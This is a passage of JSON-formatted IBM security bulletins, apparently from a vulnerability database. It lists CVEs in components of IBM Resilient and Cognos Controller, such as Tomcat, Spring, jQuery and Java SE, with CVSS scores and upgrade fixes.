"CVE-2019-4687", "CVE-2019-4702"], "modified": "2021-01-12T14:42:24", "id": "366CE799D9AEE4234CE4D38A22D774A769300127F0319D9238DAEC27C48436E1", "href": "https://www.ibm.com/support/pages/node/6403331", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-24T05:40:04", "description": "## Summary\n\nThe product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0232](<https://vulners.com/cve/CVE-2019-0232>) \n** DESCRIPTION: **When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog ([https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injecti\u2026](<https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html>)) and this archived MSDN blog ([https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft\u2026](<https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/>)). \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159398](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159398>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n** CVEID: **[CVE-2018-11784](<https://vulners.com/cve/CVE-2018-11784>) \n** DESCRIPTION: **When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/150860](<https://exchange.xforce.ibmcloud.com/vulnerabilities/150860>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N)\n\n** CVEID: **[CVE-2017-6056](<https://vulners.com/cve/CVE-2017-6056>) \n** DESCRIPTION: **It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/122312](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122312>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n** CVEID: **[CVE-2016-6325](<https://vulners.com/cve/CVE-2016-6325>) \n** DESCRIPTION: **The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117859](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117859>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n** CVEID: **[CVE-2016-5425](<https://vulners.com/cve/CVE-2016-5425>) \n** DESCRIPTION: **The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group. \nCVSS Base score: 8.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117580](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117580>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n** CVEID: **[CVE-2019-0222](<https://vulners.com/cve/CVE-2019-0222>) \n** DESCRIPTION: **In Apache ActiveMQ 5.0.0 - 5.15.8, unmarshalling corrupt MQTT frame can lead to broker Out of Memory exception making it unresponsive. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/158686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/158686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n** CVEID: **[CVE-2018-11775](<https://vulners.com/cve/CVE-2018-11775>) \n** DESCRIPTION: **TLS hostname verification when using the Apache ActiveMQ Client before 5.15.6 was missing which could make the client vulnerable to a MITM attack between a Java application using the ActiveMQ client and the ActiveMQ server. This is now enabled by default. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/149705](<https://exchange.xforce.ibmcloud.com/vulnerabilities/149705>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n** CVEID: **[CVE-2015-5184](<https://vulners.com/cve/CVE-2015-5184>) \n** DESCRIPTION: **The Hawtio console in A-MQ allows remote attackers to obtain sensitive information and perform other unspecified impact. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/132635](<https://exchange.xforce.ibmcloud.com/vulnerabilities/132635>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n** CVEID: **[CVE-2015-5183](<https://vulners.com/cve/CVE-2015-5183>) \n** DESCRIPTION: **The Hawtio console in A-MQ does not set HTTPOnly or Secure attributes on cookies. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/132634](<https://exchange.xforce.ibmcloud.com/vulnerabilities/132634>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n** CVEID: **[CVE-2015-5182](<https://vulners.com/cve/CVE-2015-5182>) \n** DESCRIPTION: **Cross-site request forgery (CSRF) vulnerability in the jolokia API in A-MQ. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/132633](<https://exchange.xforce.ibmcloud.com/vulnerabilities/132633>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n** CVEID: **[CVE-2019-0194](<https://vulners.com/cve/CVE-2019-0194>) \n** DESCRIPTION: **Apache Camel's File is vulnerable to directory traversal. Camel 2.21.0 to 2.21.3, 2.22.0 to 2.22.2, 2.23.0 and the unsupported Camel 2.x (2.19 and earlier) versions may be also affected. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160305](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160305>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n** CVEID: **[CVE-2018-1000613](<https://vulners.com/cve/CVE-2018-1000613>) \n** DESCRIPTION: **Legion of the Bouncy Castle Legion of the Bouncy Castle Java Cryptography APIs 1.58 up to but not including 1.60 contains a CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in XMSS/XMSS^MT private key deserialization that can result in Deserializing an XMSS/XMSS^MT private key can result in the execution of unexpected code. This attack appear to be exploitable via A handcrafted private key can include references to unexpected classes which will be picked up from the class path for the executing application. This vulnerability appears to have been fixed in 1.60 and later. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148041](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148041>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n** CVEID: **[CVE-2018-1000180](<https://vulners.com/cve/CVE-2018-1000180>) \n** DESCRIPTION: **Bouncy Castle BC 1.54 - 1.59, BC-FJA 1.0.0, BC-FJA 1.0.1 and earlier have a flaw in the Low-level interface to RSA key pair generator, specifically RSA Key Pairs generated in low-level API with added certainty may have less M-R tests than expected. This appears to be fixed in versions BC 1.60 beta 4 and later, BC-FJA 1.0.2 and later. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/144810](<https://exchange.xforce.ibmcloud.com/vulnerabilities/144810>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n** CVEID: **[CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n** DESCRIPTION: **Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151641](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151641>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n** CVEID: **[CVE-2017-13098](<https://vulners.com/cve/CVE-2017-13098>) \n** DESCRIPTION: **BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as \"ROBOT.\" \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136241>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Resilient| v33.x \n \n\n\n## Remediation/Fixes\n\nUsers must upgrade to v34.0 or higher of IBM Resilient in order to obtain a fix for this vulnerability. You can upgrade the platform and apply the security updates by following the instructions in the \"**Upgrade Procedure**\" section in the [IBM Knowledge Center](<https://www.ibm.com/support/knowledgecenter/SSBRUQ_34.0.0/com.ibm.resilient.doc/install/resilient_install_upgrading.htm> \"IBM Knowledge Center\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-19T21:45:22", "type": "ibm", "title": "Security Bulletin: Resilient is vulnerable to Using Components with Known Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5182", "CVE-2015-5183", "CVE-2015-5184", "CVE-2016-5425", "CVE-2016-6325", "CVE-2016-6816", "CVE-2017-13098", "CVE-2017-6056", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-11775", "CVE-2018-11784", "CVE-2018-15756", "CVE-2019-0194", "CVE-2019-0222", "CVE-2019-0232"], "modified": "2021-04-19T21:45:22", "id": "55156FCD842A2CC421648C286DB79335E98E88FF88D30BADC857588FB7995139", "href": "https://www.ibm.com/support/pages/node/3011649", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-28T21:37:49", "description": "## Summary\n\nThis Security Bulletin addresses multiple vulnerabilities that have been remediated in IBM Cognos Controller 10.4.2 FP2 and 10.4.1 IF15 . There are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 used by IBM Cognos Controller. The applicable CVEs have been addressed by upgrading to IBM\u00ae Runtime Environment Java\u2122 Version 8 Service Refresh 7 Fix Pack 10. If you run your own Java code using IBM\u00ae Runtime Environment Java\u2122 delivered with this product, you should evaluate your code to determine whether additional Java vulnerabilities are applicable to your code. For a complete list of vulnerabilities, refer to the \"IBM Java SDK Security Bulletin\", located in the References section for more information. There are vulnerabilities in IBM WebSphere Application Server Liberty used by IBM Cognos Controller. The applicable CVEs have been addressed by upgrading to IBM WebSphere Application Server Liberty 22.0.0.6. jQuery is a JavaScript library for HTML DOM tree traversal and manipulation. JQuery has been upgraded to version 3.6.0 in IBM Cognos Controller 10.4.2. jQuery is not used in IBM Cognos Controller 10.4.1 or 10.4.0. IBM Cognos Controller is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Cognos Controller in Server Side Rest APIs. IBM Cognos Controller 10.4.2 FP2 and IBM Cognos Controller 10.4.1 IF15 include Spring 5.3.18. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-39031](<https://vulners.com/cve/CVE-2021-39031>) \n** DESCRIPTION: **IBM WebSphere Application Server - Liberty 17.0.0.3 through 22.0.0.1 could allow a remote authenticated attacker to conduct an LDAP injection. By using a specially crafted request, an attacker could exploit this vulnerability and could result in in granting permission to unauthorized resources. IBM X-Force ID: 213875. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213875>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35603](<https://vulners.com/cve/CVE-2021-35603>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to obtain sensitive information resulting in a low confidentiality impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211676](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211676>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2020-5421](<https://vulners.com/cve/CVE-2020-5421>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by improper input validation. By using a specially-crafted jsessionid path parameter, an attacker could exploit this vulnerability to bypass RFD Protection. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-35560](<https://vulners.com/cve/CVE-2021-35560>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Deployment component could allow an unauthenticated attacker to take control of the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211636](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211636>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35586](<https://vulners.com/cve/CVE-2021-35586>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211661](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211661>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35578](<https://vulners.com/cve/CVE-2021-35578>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211654>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35564](<https://vulners.com/cve/CVE-2021-35564>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Keytool component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211640](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211640>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-35559](<https://vulners.com/cve/CVE-2021-35559>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Swing component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211635](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211635>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35556](<https://vulners.com/cve/CVE-2021-35556>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Swing component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211632](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211632>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35565](<https://vulners.com/cve/CVE-2021-35565>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211641](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211641>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35588](<https://vulners.com/cve/CVE-2021-35588>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 3.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211662](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211662>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-41035](<https://vulners.com/cve/CVE-2021-41035>) \n** DESCRIPTION: **Eclipse Openj9 could allow a remote attacker to gain elevated privileges on the system, caused by not throwing IllegalAccessError for MethodHandles that invoke inaccessible interface methods. By persuading a victim to execute a specially-crafted program under a security manager, an attacker could exploit this vulnerability to gain elevated privileges and execute arbitrary code on the system. \nCVSS Base score: 7.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212010](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212010>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-11023](<https://vulners.com/cve/CVE-2020-11023>) \n** DESCRIPTION: **jQuery is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the option elements. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181350](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181350>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-11022](<https://vulners.com/cve/CVE-2020-11022>) \n** DESCRIPTION: **jQuery is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the jQuery.htmlPrefilter method. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181349](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181349>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2018-25031](<https://vulners.com/cve/CVE-2018-25031>) \n** DESCRIPTION: **swagger-ui could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a specially-crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217346](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217346>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2021-46708](<https://vulners.com/cve/CVE-2021-46708>) \n** DESCRIPTION: **npm swagger-ui-dist could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217359](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217359>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-35561](<https://vulners.com/cve/CVE-2021-35561>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Utility component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211637](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211637>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2020-7656](<https://vulners.com/cve/CVE-2020-7656>) \n** DESCRIPTION: **jQuery is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the load method. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/182264](<https://exchange.xforce.ibmcloud.com/vulnerabilities/182264>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-22475](<https://vulners.com/cve/CVE-2022-22475>) \n** DESCRIPTION: **IBM WebSphere Application Server Liberty and Open Liberty 17.0.0.3 through 22.0.0.5 are vulnerable to identity spoofing by an authenticated user. IBM X-Force ID: 225603. \nCVSS Base score: 7.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/225603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/225603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L) \n \n** CVEID: **[CVE-2021-35517](<https://vulners.com/cve/CVE-2021-35517>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out of memory error when allocating large amounts of memory. By persuading a victim to open a specially-crafted TAR archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' tar package. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205307](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205307>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-36090](<https://vulners.com/cve/CVE-2021-36090>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By reading a specially-crafted ZIP archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' zip package. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205310](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205310>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-21365](<https://vulners.com/cve/CVE-2022-21365>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217659](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217659>) for the current score. \nCVSS Vector: 